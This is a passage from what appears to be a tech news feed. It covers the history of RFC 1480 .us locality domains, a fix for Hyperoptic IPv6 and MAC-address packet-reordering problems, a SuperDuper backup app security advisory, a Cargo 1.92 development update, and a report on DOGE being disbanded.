The issue is more interesting when we consider geography. For a very long time, TLDs have been split into two categories: global TLDs, or gTLDs, and country-code TLDs, or ccTLDs. ccTLDs reflect the ISO country codes of each country, and are intended for use by those countries, while gTLDs are arbitrary and reflect the fact that DNS was designed in the US. The ".gov" gTLD, for example, is for use by the US government, while the UK is stuck with ".gov.uk". This does seem unfair but it's now very much cemented into the system: for the large part, US entities use gTLDs, while entities in other countries use names under their respective ccTLDs. The ".us" ccTLD exists just as much as all the others, but is obscure enough that my choice to put my personal website under .us (not an ideological decision but simply a result of where a nice form of my name was available) sometimes gets my email address rejected.

Also, a common typo for ".us" is ".su" and that's geopolitically amusing. .su is of course the ccTLD for the Soviet Union, which no longer exists, but the ccTLD lives on in a limited way because it became Structurally Important and difficult to remove, as names and addresses tend to do.

We can easily imagine a world where this historical injustice had been fixed: as the internet became more global, all of our US institutions could have moved under the .us ccTLD. In fact, why not go further? Geographers have long organized political boundaries into a hierarchy. The US is made up of states, each of which has been assigned a two-letter code by the federal government. We have ".us", why not "nm.us"?

The answer, of course, is that we do.

In the modern DNS, all TLDs have been delegated to an organization who administers them. The .us TLD is rightfully administered by the National Telecommunications and Information Administration, on the same basis by which all ccTLDs are delegated to their respective national governments. Being the US government, NTIA has naturally privatized the function through a contract to telecom-industrial-complex giant Neustar. Being a US company, Neustar restructured and sold its DNS-related business to GoDaddy. Being a US company, GoDaddy rose to prominence on the back of infamously tasteless television commercials, and its subsidiary Registry Services LLC now operates our nation's corner of the DNS.

But that's the present---around here, we avoid discussing the present so as to hold crushing depression at bay. Let's turn our minds to June 1993, and the publication of RFC 1480 "The US Domain." To wit:

Even though the original intention was that any educational institution anywhere in the world could be registered under the EDU domain, in practice, it has turned out with few exceptions, only those in the United States have registered under EDU, similarly with COM (for commercial). In other countries, everything is registered under the 2-letter country code, often with some subdivision. For example, in Korea (KR) the second level names are AC for academic community, CO for commercial, GO for government, and RE for research. However, each country may go its own way about organizing its domain, and many have.

Oh, so let's sort it out!

There are no current plans of putting all of the organizational domains EDU, GOV, COM, etc., under US. These name tokens are not used in the US Domain to avoid confusion.

Oh. Oh well.

Currently, only four year colleges and universities are being registered in the EDU domain. All other schools are being registered in the US Domain.

Huh?

RFC 1480 is a very interesting read. It makes passing references to so many facets of DNS history that could easily be their own articles. It also defines a strict, geography-based hierarchy for the .us domain that is a completely different universe from the one in which we now live. For example, we learned above that, in 1993, only four-year institutions were being placed under .edu. What about the community colleges? Well, RFC 1480 has an answer. Central New Mexico Community College would, of course, fall under cnm.cc.nm.us. Well, actually, in 1993 it was called the Technical-Vocational Institute, so it would have been tvi.tec.nm.us. That's right, the RFC describes both "cc" for community colleges and "tec" for technical institutes.

Even more surprising, it describes placing entities under a "locality" such as a city. The examples of localities given are "berkeley.ca.us" and "portland.wa.us", the latter of which betrays an ironic geographical confusion. It then specifies "ci" for city and "co" for county, meaning that the city government of our notional Portland, Washington would be ci.portland.wa.us. Agencies could go under the city government component (the RFC gives the example "Fire-Dept.CI.Los-Angeles.CA.US") while private businesses could be placed directly under the city (e.g. "IBM.Amonk.NY.US"). The examples here reinforce that the idea itself is different from how we use DNS today: The DNS of RFC 1480 is far more hierarchical and far more focused on full names, without abbreviations.

Of course, the concept is not limited to local government. RFC 1480 describes "fed.us" as a suffix for the federal government (the example "dod.fed.us" illustrates that this has not at all happened), and even "General Independent Entities" and "Distributed National Institutes" for those trickier cases.

We can draw a few lessons from how this proposal compares to our modern day. Back in the 1990s, .gov was limited to the federal government. The thinking was that all government agencies would move into .us, where the hierarchical structure made it easier to delegate management of state and locality subtrees. What actually happened was the opposite: the .us thing never really caught on, and a more straightforward and automated management process made .gov available to state and local governments. The tree has effectively been flattened.

That's not to say that none of these hierarchical names saw use. GoDaddy continues to maintain what they call the "usTLD Locality-Based Structure". At the decision of the relevant level of the hierarchy (e.g. a state), locality-based subdomains of .us can either be delegated to the state or municipality to operate, or operated by GoDaddy itself as the "Delegated Manager." The latter arrangement is far more common, and it's going to stay that way: RFC 1480 names are not dead, but they are on life support. GoDaddy's contract allows them to stop onboarding any additional delegated managers, and they have.

Few of these locality-based names found wide use, and there are even fewer left today. Multnomah County Library once used "multnomah.lib.or.us," which I believe was actually the very first "library" domain name registered. It now silently redirects to "multcolib.org", which we could consider a graceful name only in that the spelling of "Multnomah" is probably not intuitive to those not from the region. As far as I can tell, the University of Oregon and OGI (part of OHSU) were keeping very close tabs on the goings-on of academic DNS, as Oregon entities are conspicuously over-represented in the very early days of RFC 1480 names---behind only California, although Georgia Tech and Trent Heim of former Colorado company XOR both registered enough names to give their states a run for the money.

"co.bergen.nj.us" works, but just gets you a redirect notice page to bergencountynj.gov. It's interesting that this name is actually longer than the RFC 1480 name, but I think most people would agree that bergencountynj.gov is easier to remember. Some of that just comes down to habit, we all know ".gov", but some of it is more fundamental. I don't think that people often understand the hierarchical structure of DNS, at least not intuitively, and that makes "deeply hierarchical" (as GoDaddy calls them) names confusing.

Certainly the RFC 1480 names for school districts produced complaints. They were also by far the most widely adopted. You can pick and choose examples of libraries (.lib.[state].us) and municipal governments that have used RFC 1480 names, but school districts are another world: most school districts that existed at the time have a legacy of using RFC 1480 naming. As one of its many interesting asides, RFC 1480 explains why: the practice of putting school districts under [district].k12.[state].us actually predates RFC 1480. Indeed, the RFC seems to have been written in part to formalize the existing practice. The idea of the k12.[state].us hierarchy originated within IANA in consultation with InterNIC (newly created at the time) and the Federal Networking Council, a now-defunct advisory committee of federal agencies that made a number of important early decisions about internet architecture.

RFC 1480 is actually a revision on the slightly older RFC 1386, which instead of saying that schools were already using the k12 domains, says that "there ought to be a consistent scheme for naming them." It then says that the k12 branch has been "introduced" for that purpose. RFC 1386 is mostly silent on topics other than schools, so I think it was written to document the decision made about schools with other details about the use of locality-based domains left sketchy until the more thorough RFC 1480.

The decision to place "k12" under the state rather than under a municipality or county might seem odd, but the RFC gives a reason. It's not unusual for school districts, even those named after a municipality, to cover a larger area than the municipality itself. Albuquerque Public Schools operates schools in the East Mountains; Portland Public Schools operates schools across multiple counties and beyond city limits. Actually the RFC gives exactly that second one as an example:

For example, the Portland school district in Oregon, is in three or four counties. Each of those counties also has non-Portland districts.

I include that quote mostly because I think it's funny that the authors now know what state Portland is in. When you hear "DNS" you think Jon Postel, at least if you're me, but RFC 1480 was written by Postel along with a less familiar name, Ann Westine Cooper. Cooper was a coworker of Postel at USC, and RFC 1480 very matter-of-factly names the duo of Postel and Cooper as the administrator of the .US TLD. That's interesting considering that almost five years later Postel would become involved in a notable conflict with the federal government over control of DNS---one of the events that precipitated today's eccentric model of public-private DNS governance.

There are other corners of the RFC 1480 scheme that were not contemplated in 1993, and have managed to outlive many of the names that were. Consider, for example, our indigenous nations: these are an exception to the normal political hierarchy of the US. The Navajo Nation, for example, exists in a state that is often described as parallel to a state, but isn't really. Native nations are sovereign, but are also subject to federal law by statute, and subject to state law by various combinations of statute, jurisprudence, and bilateral agreement. I didn't really give any detail there and I probably still got something wrong, such is the complicated legal history and present of Native America. So where would a native sovereign government put their website? They don't fall under the traditional realm of .gov, federal government, nor do they fall under a state-based hierarchy. Well, naturally, the Navajo Nation is found at navajo-nsn.gov.

We can follow the "navajo" part but the "nsn" is odd, unless they spelled "nation" wrong and then abbreviated it, which I've always thought is what it looks like on first glance. No, this domain name is very much an artifact of history. When the problem of sovereign nations came to Postel and Cooper, the solution they adopted was a new affinity group, like "fed" and "k12" and "lib": "nsn", standing for Native Sovereign Nation. Despite being a late comer, nsn.us probably has the most enduring use of any part of the RFC 1480 concept. Dozens of pueblos, tribes, bands, and confederations still use it. squamishtribe.nsn.us, muckleshoot.nsn.us, ctsi.nsn.us, sandiapueblo.nsn.us.

Yet others have moved away... in a curiously "partial" fashion. navajo-nsn.gov as we have seen, but an even more interesting puzzler is tataviam-nsn.us. It's only one character away from a "standardized" NSN affinity group locality domain, but it's so far away. As best I can tell, most of these governments initially adopted "nsn.us" names, which cemented the use of "nsn" in a similar way to "state" or "city" as they appear in many .gov domains to this day. Policies on .gov registration may be a factor as well, the policies around acceptable .gov names seem to have gone through a long period of informality and then changed a number of times. Without having researched it too deeply, I have seen bits and pieces that make me think that at various points NTIA has preferred that .gov domains for non-federal agencies have some kind of qualifier to indicate their "level" in the political hierarchy. In any case, it's a very interesting situation because "native sovereign nation" is not otherwise a common term in US government. It's not like lawyers or lawmakers broadly refer to tribal governments as NSNs, the term is pretty much unique to the domain names.

So what ever happened to locality-based names? RFC 1480 names have fallen out of favor to such an extent as to be considered legacy by many of their users. Most Americans are probably not aware of this name hierarchy at all, despite it ostensibly being the unified approach for this country. In short, it failed to take off, and those sectors that had widely adopted it (such as schools) have since moved away. But why?

As usual, there seem to be a few reasons. The first is user-friendliness. This is, of course, a matter of opinion---but anecdotally, many people seem to find deeply hierarchical domain names confusing. This may be a self-fulfilling prophecy, since the perception that multi-part DNS names are user-hostile means that no one uses them which means that no users are familiar with them. Maybe, in a different world, we could have broken out of that loop. I'm not convinced, though. In RFC 1480, Postel and Cooper argue that a deeper hierarchy is valuable because it allows for more entities to have their "obviously correct" names. That does make sense to me, splitting the tree up into more branches means that there is less name contention within each branch. But, well, I think it might be the kind of logic that is intuitive only those who work in computing. For the general public, I think long multi-part names quickly become difficult to remember and difficult to type. When you consider the dollar amounts that private companies have put into dictionary word domain names, it's no surprise that government agencies tend to prefer one-level names with full words and simple abbreviations.

I also think that the technology outpaced the need that RFC 1480 was intended to address. The RFC makes it very clear that Postel and Cooper were concerned about the growing size of the internet, and expected the sheer number of organizations going online to make maintenance of the DNS impractical. They correctly predicted the explosion of hosts, but not the corresponding expansion of the DNS bureaucracy. Between the two versions of the .us RFC, DNS operations were contracted to Network Solutions. This began a winding path that lead to delegation of DNS zones to various private organizations, most of which fully automated registration and delegation and then federated it via a common provisioning protocol. The size of, say, the .com zone really did expand beyond what DNS's designers had originally anticipated... but it pretty much worked out okay. The mechanics of DNS's maturation probably had a specifically negative effect on adoption of .us, since it was often under a different operator from the "major" domain names and not all "registrars" initially had access.

Besides, the federal government never seems to have been all that on board with the concept. RFC 1480 could be viewed as a casualty of the DNS wars, a largely unexplored path on the branch of DNS futures that involved IANA becoming completely independent of the federal government. That didn't happen. Instead, in 2003 .gov registration was formally opened to municipal, state, and tribal governments. It became federal policy to encourage use of .gov for trust reasons (DNSSEC has only furthered this), and .us began to fall by the wayside.

That's not to say that RFC 1480 names have ever gone away. You can still find many of them in use. state.nm.us doesn't have an A record, but governor.state.nm.us and a bunch of other examples under it do. The internet is littered with these locality-based names, many of them hiding out in smaller agencies and legacy systems. Names are hard to get right, and one of the reasons is that they're very hard to get rid of.

When things are bigger, names have to be longer. There is an argument that with only 8-character names, and in each position allow a-z, 0-9, and -, you get 37**8 = 3,512,479,453,921 or 3.5 trillion possible names. It is a great argument, but how many of us want names like "xs4gp-7q". It is like license plate numbers, sure some people get the name they want on a vanity plate, but a lot more people who want something specific on a vanity plate can't get it because someone else got it first. Structure and longer names also let more people get their "obviously right" name.

You look at Reddit these days and see all these usernames that are two random words and four random numbers, and you see that Postel and Cooper were right. Flat namespaces create a problem, names must either be complex or long, and people don't like it either. What I think they got wrong, at a usability level, is that deep hierarchies still create names that are complex and long. It's a kind of complexity that computer scientists are more comfortable with, but that's little reassurance when you're staring down the barrel of "bridger.pps.k12.or.us".

Hyperoptic: IPv6 and Out-of-Order Packets

Lobsters
blog.zakkemble.net
2025-11-25 02:08:11
Comments...
Original Article

IPv6 Connectivity

It's probably about time that I figured out how to enable IPv6 on my RouterPi and network! At first, configuring dhcpcd was fairly straightforward and IPv6 connectivity worked almost right away. However, it later became intermittent after rebooting the router and checking that everything was still working. For some reason my ISP's (Hyperoptic) upstream router (not the one in my home) had decided to stop responding to Router Solicitation (RS) packets sent by my router.

Router Solicitations (RS) are part of the IPv6 Neighbour Discovery Protocol (NDP) and are how IPv6-enabled devices locate routers on the link, such as the default gateway. When an RS packet is transmitted, IPv6-enabled routers should respond with a Router Advertisement (RA) packet advertising their presence. Routers also transmit RAs at periodic intervals; these are called unsolicited router advertisements.

While Hyperoptic's upstream router did not respond to RS packets, it did send unsolicited RA packets roughly every 15 - 30 minutes. In fact, it would send two identical RA packets at the same time, what's going on there?

This meant that after re-plugging the WAN cable or restarting the router, it would:

  • Successfully obtain a DHCPv6 prefix delegation,
  • ...then take up to 30 minutes before receiving an unsolicited RA,
  • ...leaving the network with valid IPv6 addresses but no default route.

This resulted in the network seeming slow and strange, as devices would attempt to connect to websites using IPv6 before giving up and sometimes falling back to IPv4. The same thing also happened with the official home router provided by Hyperoptic.

After some experimentation I found that changing the MAC address of the WAN interface to any other valid address would trigger the ISP's upstream router into sending an unsolicited RA immediately after a new DHCPv6 prefix delegation had been assigned. This only happened once per MAC address change. I verified this by swapping between two routers - the RouterPi and the home router supplied by Hyperoptic. Since they have different MAC addresses, an RA would be sent quickly after DHCPv6 completed, and IPv6 connectivity would work right away. However, re-plugging the same router would once again result in the network appearing broken for a while due to the lack of a router advertisement and missing default IPv6 route.

So, if you're running into this problem while using the Hyperoptic home router, there's not much you can do about it. But if you're running your own custom Linux router, you can use macchanger as a quick workaround:


sudo macchanger -e eth1
sudo systemctl restart dhcpcd

The WAN cable may have to be unplugged and plugged back in after running the commands, as it seems Hyperoptic only allows one MAC address change per cable plug-in.

Alternatively, since the default gateway address does not seem to change, it's possible to just add the gateway address manually:


sudo ip -6 route replace default via (gateway IPv6 address) dev eth1 metric 2000

This can be automated by creating a dhcpcd hook script that adds the default gateway on the RENEW6 event.

Hyperoptic also does not assign non-temporary addresses ( ia_na ), only prefix delegations ( ia_pd ). Remove ia_na from dhcpcd.conf to stop messages like eth1: DHCPv6 REPLY: No addresses have been assigned from spamming logs.

But we're not finished yet!

Out-of-Order Packets

Another small but annoying problem I noticed on the network was random out of order (OOO) packets. There are many reasons why OOO packets can occur, such as network congestion, but these events were happening frequently - even when streaming a 192 kbps MP3 over the gigabit internet connection.

Wireshark screenshot of out of order packets

After a bit of Googling, I came across this Reddit thread :

RFC4448 section 4.6

Packet reordering can happen if a frame has a leading '4' or '6' Destination MAC address, going over a L2VPN PW traversing a LAG (RFC4448 states it's the source MAC, but I have yet to see this be the case).

The first nibble of the Ethernet header is the first character of the destination MAC. Also the first nibble of the IP header is the version. The router incorrectly assumes that if the MAC starts with a '4' it must be an IPv4 packet. If it starts with a '6' it must be an IPv6 packet.

Adding the control word to the PW fixes this because it forces the router to see a '0' rather than '4' or '6' after the MPLS label.

I believe this happens because the MPLS label has no field to indicate the upper layer. For instance IP has the protocol field, Ethernet has the type field, TCP/UDP have port numbers. With MPLS there is no such field, so the router just assumes an IPv4/IPv6 header comes next, but it's really an ethernet header when using PW/L2VPN.

https://tools.ietf.org/html/rfc4448#section-4.6

As it turned out, the MAC address of my RouterPi's WAN interface started with 4 . Changing it to a0:de:ad:bb:ee:ff instantly fixed the out of order packets, hooray!

To make the MAC address permanent, create a file at /etc/systemd/network/01-wan.link containing:


[Match]
MACAddress=(original WAN MAC address)

[Link]
Name=eth1
MACAddress=a0:de:ad:bb:ee:ff

I do wonder how many people could be affected by out of order packets simply because their router's WAN MAC address starts with 4 or 6 , which could be especially troublesome for online gaming. D:

SuperDuper Security Update v3.11

Daring Fireball
www.shirt-pocket.com
2025-11-24 23:35:46
Dave Nanian and Bruce Lacey, at Shirt Pocket: Mistakes are a part of life. They’re not a great part, but when viewed “correctly”, they’re an opportunity. Well, we have three opportunities, brought to our attention by a security researcher. They’re security vulnerabilities that have been in Sup...
Original Article

Mistakes are a part of life.

They're not a great part, but when viewed "correctly", they're an opportunity.

Well, we have three opportunities, brought to our attention by a security researcher. They're security vulnerabilities that have been in SuperDuper! since the very first version, released almost 22 years ago.

Today, we're releasing fixes for the current release (the SuperDuper! v3.20 Beta is already fixed), a discussion of the problems, and the steps users can take to mitigate the issues if they cannot install the update.

We don't know of any bad actors making use of these exploits as of this post.

Mistake #1 (CVE-2025-61228)

Our auto-update mechanism can be hijacked and convinced to install a package that isn't SuperDuper.

Even though we signed and notarized our installer package, Gatekeeper is not checking that notarization when installed by macOS's package installer. As such, the download could be changed, and we'd install that instead. Since the install is being done with escalated privileges, that could allow a malicious 3rd party's program, which you would also have to install, to gain administrator access to your system.

This can only happen if a program running on your system is looking for SuperDuper to perform an update, a real update is presented through legitimate means, and you click Upgrade .

To fix this, we've done three things:

  1. We've put out an update, which you may have seen before reading this post, that explains that the fixed version of SuperDuper, v3.11, should be downloaded and installed directly from the Shirt Pocket web site...and the Upgrade button, at the bottom of the window, should not be pressed.

  2. We've changed our updater to validate the signature and notarization of the install package ourselves before installing the update.

  3. After this announcement, we will not present update notices for any version of SuperDuper prior to v3.11 unless absolutely necessary, and in those cases we will clearly indicate, as we have here, that the user should not click Upgrade . Users who cannot install the update can prevent these notices from appearing by turning off automatic updates in SuperDuper's preferences.

Mistake #2 (CVE-2025-57489)

When the lock in SuperDuper is unlocked to allow execution to occur without having to enter an administrator password, a 3rd party program could make use of our authorization to run something other than a backup with administrator privileges.

Again, this can only happen if you install something that is, itself, malicious. And it's one mechanism of many that could be used by a bad actor to gain "root" access on your system. But this one is due to our error.

To fix it, as above, we've done three things:

  1. In the same update notice, we've instructed people to install SuperDuper v3.11, downloaded directly from the web site.

  2. We've changed our program to validate that the commands being executed with escalated privileges are actually coming from our own, known, sealed, signed source.

  3. Users who cannot run the new version can lock the lock in the main window, which closes the security hole.

While the new SuperDuper v3.11, released today, ensures that all users who could run v3.10 are no longer vulnerable, one problem remains: we cannot fix older versions of SuperDuper. There are versions of SuperDuper available for macOS versions as early as 10.1, and we have no way to rebuild them. On top of that, we cannot "patch" the faulty element, because SuperDuper itself ensures that it's unmodified before running, and would refuse to run at all if patched.

Unfixed versions can be made secure by locking the lock in the main window. However, doing so means scheduled backups will not run: with the lock locked, all backups must be made by manually running SuperDuper.

Mistake #3 (CVE-2025-61229)

User-settable Before/After shell scripts run escalated, with SuperDuper's TCC Full Disk Access permissions. Since those shell scripts are referenced by the settings files for the copy or schedule, a malicious actor could modify those settings to run their own script.

As before, this would require another malicious program to be installed.

To mitigate this vulnerability, in v3.11 we've made two changes:

  1. Before/After shell scripts are forced to run with the user's ID and privileges. Individuals who require alternative execution contexts can do so through normal Unix methods such as suid .

  2. Scripts must be owned by the root user, even when run in the normal user's context. This ensures that any script that would run has been explicitly authorized by an administrative user.

Note that these Before/After scripts are explicitly referenced in the What's going to happen? section of the main window. Users who cannot update to v3.11 are advised to review that information before pressing Copy Now to ensure no unexpected entries are present.

Practical Considerations

People running old versions of macOS, with old versions of SuperDuper, on old Macs, are exposed to many security vulnerabilities, from web pages that can gain escalated privileges due to bugs in Safari or its sandbox, to other errors in the kernel that can do the same. These errors, when found, are fixed, but those fixes are not available to earlier macOS versions. Once a Mac becomes "vintage", or a version of macOS is no longer supported, security updates are no longer provided, and those issues persist.

On a system where we cannot provide a fix, you have to make a judgement call after balancing the risks of this flaw being exploited, in your personal situation, versus the inconvenience of having to manually perform backups. If you do not install malicious programs from sketchy sources after these vulnerabilities have been disclosed, you are at the same level of risk you were at before, especially since you were already at risk from actors who could exploit your unsupported OS without installing another application, such as by simply visiting a web page.

However, if you feel the additional risk is too great, you can lock the lock, set a scheduled reminder via iCal, and perform your backups manually (and, of course, you can, and should, use Time Machine as well).

Arrgh-arrgh-arrgh-arrgh (argh)

This post obviously uses a more serious tone than you may be used to on the blog.

We take security and safety extremely seriously here—if we didn't, we wouldn't have made a backup program—and, to be frank, feel frustrated and ashamed that our program can be exploited to make your system less safe.

We've taken the steps needed to fix the bugs, inform our valued users, registered or not, about the problems, and have explained how to mitigate them on any version of SuperDuper, old or new. As previously mentioned, and as far as we are aware, these vulnerabilities have not been exploited by a bad actor (which does not mean they can't be, of course).

We'd like to thank the anonymous security researcher who brought these bugs to our attention, and for working with us to verify that our fixes have corrected the errors they found.

Finally, we'd like to take this opportunity to apologize to all our users for these bugs. We hate making mistakes. We're truly sorry for these, and will continue to do our best to put out versions of SuperDuper that you can trust as one method, of many, to keep your data safe.

Thanks for reading, and for using SuperDuper. We couldn't continue to do this without you.

--Dave Nanian & Bruce Lacey

This Development-cycle in Cargo: 1.92

Lobsters
blog.rust-lang.org
2025-11-24 22:38:08
Comments...
Original Article

This Development-cycle in Cargo: 1.92

This is a summary of what has been happening around Cargo development for the last 6 weeks which is approximately the merge window for Rust 1.92.

Plugin of the cycle

Cargo can't be everything to everyone, if for no other reason than the compatibility guarantees it must uphold. Plugins play an important part of the Cargo ecosystem and we want to celebrate them.

Our plugin for this cycle is cargo-wizard which can optimize your project for build times, runtime performance, or binary size.

Thanks to Kobzol for the suggestion!

Please submit your suggestions for the next post.

Implementation

Build performance guide

On Zulip , Kobzol floated the idea of a build performance guide being added to the Cargo book . The first thing we needed to work out was how to handle having small reviewable chunks while having enough content to justify the document. We decided to hold off on merging anything until the start of this development cycle. The guide was introduced in #15970 .

Ideally, this guide wouldn't be needed. In some cases, there are steps we can take to obsolete a section, like providing a meaningful unused dependency warning ( #15813 ) rather than suggesting tools that try to guess what dependencies are unused. In some cases, builds are slower by default as we try to balance several competing needs. However, even in those cases, we can evaluate whether we have the right balance or if there is another way to meet multiple needs (e.g. #15931 ). We decided to link out to this content to help raise awareness of these efforts to track them or participate.

Going forward, we are going to need to figure out how to balance what optimizations to include and how to talk about them. How do we vet that an optimization is actually beneficial? How much of an improvement is worth mentioning? How niche or tricky of an optimization is worth including? We dealt a little bit with this when adding documentation about linkers ( #15991 ) because some platforms already have fast linkers and making linking slightly faster than that is very different than switching from a slow linker to a faster one.

We're tracking further progress on this effort at #16119 .

Cargo Script

Update from 1.86

epage posted the stabilization report for the Rust frontmatter syntax, the first step towards stabilizing Cargo script. Cargo's frontmatter parser was also updated to better match rustc's whitespace handling ( #15975 ) and error messages ( #15952 , #15972 ).

build-dir ( docs ), which split out of target-dir in Cargo 1.91, was modeled off of Cargo script but implemented independently. In #16073 , Cargo script switched to using build-dir = "{cargo-cache-home}/build/{workspace-path-hash}" which is proposed to be the new build-dir default eventually ( #16147 ). However, this did lead to issues with memfd ( #16110 ) which still needs discussion. To match the semantics of build-dir being for internals, Cargo script's Cargo.lock was moved into build-dir ( #16087 ).

In preparing to stabilize Cargo script, the Cargo team talked through some of the open questions.

In #12870 , novafacing requested a way to get the script's original path. CARGO_MANIFEST_PATH was previously added but didn't meet everyone's needs. Nemo157 pointed out that ideally CLI parsers report the script, not the binary, in usage examples. There isn't really a way for libraries like clap to detect and workaround this, requiring hacks on the user end. They suggested Cargo override arg[0] which is what CLI parsers use for usage examples. When we discussed this as a team, we were interested in people being able to get both pieces of information, the binary and the source. We were also concerned about platform support for setting arg[0] and current_exe . Granted, shebang support is also not supported on every platform. Python and Ruby report arg[0] as the script but they have more control over the behavior. In the end, we decided on setting arg[0] where possible, on a best-effort basis. We will leave current_exe untouched to serve as the way to access the binary path. We would be open to people contributing support for more platforms, likely through contributing it to std . Setting of arg[0] was implemented in #16027 .

Cargo scripts do not support every manifest field, especially for the initial release. A long standing open question has been whether the manifest fields should be validated with an allowlist or a denylist. The concern is if a new field gets added, should we err on the side of it being supported or not? Forgetting to update the Cargo script allowlist on the release of a new feature is a poor experience. On the other hand, forgetting to update the denylist could mean we commit to a feature that we shouldn't support. The ideal solution is to rely on the type system to ensure we exhausitvely the manifest fields. If that isn't possible, we erred on the side of an allowlist. Thankfully, the implementation had already been updated to make it easy to rely on the type system for this. The validation logic was changed in #16026 .

A cargo script's file name gets turned into a package.name but not every script name is a valid package.name . So far, Cargo has sanitized the file name into being a valid package.name . But valid according to whom? General Cargo commands, cargo new , or crates.io? So far, the cargo new rules had been implemented. This is important to decide upfront because the sanitization results are visible through the binary's name, cargo metadata , and --message-format json . As we stepped through each cargo new rule, we found they were becoming less relevant through other efforts in Cargo, changes in Windows, etc. We decided to do the bare minimum sanitization needed for general Cargo commands. During the implementation of #16120 , epage felt it was too premature to freely allow names that would collide with directory names from build-dir being overlaid with target-dir . Users can now move build-dir out in Rust 1.91 ( #15833 ). Changing this to be the default in Cargo is still under discussion ( #16147 ) and users could still move it back. Instead of sanitizing to avoid conflicts with build-dir content, epage let this fall back to existing validation rules that will error for now.

Public dependencies

Update from 1.76

While this feature is largely blocked on the lint within rustc, this was further refined in Cargo.

jneem experimented with Cargo rewriting the lint to provide Cargo-specific context in #16002 .

sadmac7000 changed cargo add s version auto-selection to evaluate public dependencies in case the user intends to use them together ( #15966 ).

JohnScience proposed cargo tree --edges no-external as a way to see only local packages ( #16043 ). We have this today in --depth workspace though maybe we could improve parts of our documentation about this. However, this got us to re-evaluate --depth public which walks through all public public dependencies and no further (inspired by --depth workspace ). Would this be better served as --edges public ? The flag was originally added to help in analysing the lints current behavior ( rust#119428 ). Most --edges opt-in specific edge types, while this would instead be applying a filter across edge types. The only other exception is no-proc-macros . We decided that we were comfortable adding more edge filters and decided to change this ( #16081 ).

Build-dir layout

Update from 1.90

Cargo's caches have traditionally been organized around the role they fulfil with .fingerprint/ housing the state for rebuild-detection for all packages while deps/ stores the build artifacts. This makes calling rustc easy, just pass it deps/ and it will figure out what files need to be loaded.

By mixing intermediate artifacts together like this,

  • if we were to GC the content, we'd need to track individual files for a build unit ( #5026 )
  • it is difficult to coordinate more granular locks ( #4282 )
  • it is more difficult to cache build unit artifacts across projects ( #5931 ).
  • requires Cargo to make the file names unique (except on Windows) ( #8332 )
    • and file collisions on Windows ( #8794 )
  • leads to bugs where project binaries can shadow system or Rust toolchain binaries on Windows because we have to put deps/ in PATH for linking ( #7919 )

The layout for intermediate build artifacts is an implementation detail which we can change. #15010 proposes changing the layout to be centered on the build unit the files belong to, rather than the role of the files. We have a single folder to track for GC, locking, and caching. A unique hash will be kept in the parent directory's name, allowing us to reduce collisions of files and shadowing of binaries on Windows. This new layout was implemented in #15947 .

There is a catch: many tools in the ecosystem depend on the layout. The reason ranger-ross added support for the new build-dir was to serve as an easy for projects to test if they rely on internals of Cargo.

We can punt on finding alternative solutions to these projects, but that means each time we change the layout of the build-dir , there is an ecosystem cost. Turns out, we might want to change it multiple times. The build-dir is subdivided by <profile>/<platform>/ but that is mostly beneficial for locking purposes. If we had a new locking scheme ( #4282 ), we could reduce path lengths on Windows and allow intermediate artifact reuse between profiles and even platforms (e.g. build script builds). As I said earlier, the locking scheme is also blocked on the new layout. We either have to implement and stabilize them together or have two transitions. It doesn't stop there. A new locking scheme may be benefited by us moving away from mutable intermediate artifacts which could balloon disk usage as each build for each edit of your source would have a distinct artifact. This would be benefitted by aggressive GC of the intermediate artifacts which is also blocked on the new layout.

As a team, we discussed this tricky path towards stabilization of the new layout.

After talking through the interaction between these different features, we leaned towards doing one layout change without blocking on any other work and evaluating how that goes to see how we should handle further layout changes.

It would be great if crater could identify projects impacted by changing the layout. It may not help us when it is a build process extracting build.rs generated artifacts or when running the tool being built. There may be some -sys crate situations it might identify. Later, ehuss posted on Zulip some preliminary investigations into what projects might be doing relying on the build-dir layout. In addition to this type of inspection, we could change the layout on nightly-only to help identify impacted projects.

We are using build-dir as an opt-in for people to evaluate both changing it itself and as a smoke test for a new layout. Even once we change the build-dir location ( #16147 ), users will be able to opt-out. Should we do similar for the new layout itself? If we made the flag a proper config , this would give the build-dir layout more of a semblance of stability than is meant. This is also a maintenance burden. Supporting the two layouts already complicates things and has limited our changes to the new layout. Supporting the old layout for any period of time will likely require all features built on top of it to be conditioned on it until we are able to drop the old layout. A temporary environment variable to toggle the behavior may work.

At this point, it is on epage and ranger-ross to come up with a concrete transition plan.

Misc

Focus areas without progress

These are areas of interest for Cargo team members with no reportable progress for this development-cycle.

Ready-to-develop:

Planning:

How you can help

If you have ideas for improving cargo, we recommend first checking our backlog and then exploring the idea on Internals .

If there is a particular issue that you are wanting resolved that wasn't discussed here, some steps you can take to help move it along include:

  • Summarizing the existing conversation (example: Better support for docker layer caching , Change in Cargo.lock policy , MSRV-aware resolver )
  • Document prior art from other ecosystems so we can build on the work others have done and make something familiar to users, where it makes sense
  • Document related problems and solutions within Cargo so we see if we are solving to the right layer of abstraction
  • Building on those posts, propose a solution that takes into account the above information and cargo's compatibility requirements ( example )

We are available to help mentor people for S-accepted issues on Zulip and you can talk to us in real-time during Contributor Office Hours . If you are looking to help with one of the bigger projects mentioned here and are just starting out, fixing some issues will help familiarize yourself with the process and expectations, making things go more smoothly. If you'd like to tackle something without a mentor , the expectations will be higher on what you'll need to do on your own.

DoGE "cut muscle, not fat"; 26K experts rehired after brutal cuts

Hacker News
arstechnica.com
2025-11-24 22:12:04
Comments...
Original Article

Government brain drain will haunt US after DOGE abruptly terminated.

Billionaire Elon Musk, the head of the Department of Government Efficiency (DOGE), holds a chainsaw as he speaks at the annual Conservative Political Action Conference. Credit: SAUL LOEB / Contributor | AFP

After Donald Trump curiously started referring to the Department of Government Efficiency exclusively in the past tense, an official finally confirmed Sunday that DOGE “doesn’t exist.”

Talking to Reuters , Office of Personnel Management (OPM) Director Scott Kupor confirmed that DOGE—a government agency notoriously created by Elon Musk to rapidly and dramatically slash government agencies—was terminated more than eight months early. This may have come as a surprise to whoever runs the DOGE account on X, which continued posting up until two days before the Reuters report was published.

As Kupor explained, a “centralized agency” was no longer necessary, since OPM had “taken over many of DOGE’s functions” after Musk left the agency last May. Around that time, DOGE staffers were embedded at various agencies, where they could ostensibly better coordinate with leadership on proposed cuts to staffing and funding.

Under Musk, DOGE was hyped as planning to save the government a trillion dollars. On X, Musk bragged frequently about the agency, posting in February that DOGE was “the one shot the American people have to defeat BUREAUcracy, rule of the bureaucrats, and restore DEMOcracy, rule of the people. We’re never going to get another chance like this.”

The reality fell far short of Musk’s goals, with DOGE ultimately reporting it saved $214 billion—an amount that may be overstated by nearly 40 percent, critics warned earlier this year .

